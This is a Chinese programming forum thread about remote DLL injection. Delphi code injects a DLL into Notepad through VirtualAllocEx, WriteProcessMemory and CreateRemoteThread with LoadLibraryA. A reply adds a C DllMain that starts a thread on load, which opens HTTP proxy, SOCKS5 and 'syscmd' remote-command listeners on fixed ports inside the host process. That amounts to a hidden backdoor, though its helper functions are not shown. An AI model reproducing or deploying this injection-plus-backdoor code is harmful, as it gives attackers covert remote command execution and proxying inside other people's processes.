请教DLL远程注入问题!(50分)


hmy211

library MyDll;<br>{$R *.res}<br><br>uses<br>&nbsp; Windows;<br><br>function Testdll: Pointer; stdcall;<br>begin<br>&nbsp; MessageBox(0,'Dll驻留成功!','Dll',0); &nbsp;<br>end;<br><br>exports<br>&nbsp; Testdll;<br>begin<br>&nbsp; MessageBox(0,'DLL安装成功','DLL',0);<br>end.<br><br>一个这样的DLL文件。我要求让他插入记事本里面。并显示'Dll驻留成功!'这个对话框!<br>我这有个插入记事本的例子.但这样只会显示'DLL安装成功'消息.<br>我现在要让他也显示'Dll驻留成功!'消息框.请问需要怎么处理.(前提DLL文件不能变动)<br>procedure TmyForm.Button1Click(Sender: TObject);<br>var<br>&nbsp; h:longword; //放句柄,中间顺便暂放下PID<br>&nbsp; tmp:longword;//这个专门来占格式收集垃圾<br>&nbsp; DllName:pchar;<br>&nbsp; Mysize:longword;//放字符串长度<br>&nbsp; Parameter:pointer;//放那个参数的指针(位置在目标进程内)<br>begin<br>&nbsp;DLLName:='MyDll.dll';<br>&nbsp;Mysize:=strlen(Dllname)+1;<br>&nbsp;winexec('notepad',1);<br>&nbsp;GetWindowThreadProcessId(FindWindow('notepad', nil), @h);<br>&nbsp;h:=OpenProcess(PROCESS_ALL_ACCESS, False, h);<br>&nbsp;Parameter:= VirtualAllocEx(h, nil, Mysize, MEM_COMMIT, PAGE_READWRITE);<br>&nbsp;WriteProcessMemory(h, Parameter, Pointer(DllName), MySize, tmp);<br>&nbsp;CreateRemoteThread(h,nil, &nbsp;0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameter, 0 , tmp);<br>end;
 
怎么没人帮忙呢
 
你的意思是不是想既自动载入 DLL，又自动执行里面的函数？<br>我的做法是：在 DLL_PROCESS_ATTACH 中 BeginThread。
 
你都安装上去了，<br>还怕不能调用吗？
 
直接调用<br>Testdll 不就可以了么？
 
TrustMe，能把你的做法给我一个实例吗？谢谢了！
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)<br>{<br>&nbsp; &nbsp; switch (fdwReason)<br>&nbsp; &nbsp; {<br>&nbsp; &nbsp; &nbsp; &nbsp; case DLL_PROCESS_ATTACH:<br>&nbsp; &nbsp; &nbsp; &nbsp; {<br>&nbsp; &nbsp; &nbsp; &nbsp; hinstance = hinstDLL;<br> CreateThread(NULL, 0, exec_main, NULL, 0, NULL);<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break;<br>&nbsp; &nbsp; &nbsp; &nbsp; };<br>&nbsp; &nbsp; &nbsp; &nbsp; case DLL_PROCESS_DETACH:<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break;<br><br>&nbsp; &nbsp; &nbsp; &nbsp; case DLL_THREAD_ATTACH:<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break;<br><br>&nbsp; &nbsp; &nbsp; &nbsp; case DLL_THREAD_DETACH:<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break;<br>&nbsp; &nbsp; }<br>&nbsp; &nbsp; return TRUE; // succesful<br>}<br><br>DWORD WINAPI exec_main(void* p)<br>{<br> if(shared_init() == 0)<br> {<br> unsigned short port1 = 8000;<br> unsigned short port2 = 1080;<br> unsigned short port3 = 8686;<br> SOCKET svr1 = shared_start_svr(&amp;port1, http_cltproc);<br> SOCKET svr2 = shared_start_svr(&amp;port2, sock5_cltproc);<br> SOCKET svr3 = shared_start_svr(&amp;port3, syscmd_cltproc);<br> char s[0xfff];<br><br> // TODO : 2008-09-22<br> mydns_init();<br><br> shared_printf("bind and listen on [http : %d , sock5 : %d , syscmd : %d ] ok./n", port1, port2, port3);<br> do<br> {<br> Sleep(1000);<br> }while(TRUE);<br> }<br><br> mydns_done();<br> shared_done();<br><br>&nbsp; &nbsp; return 0;<br>}
 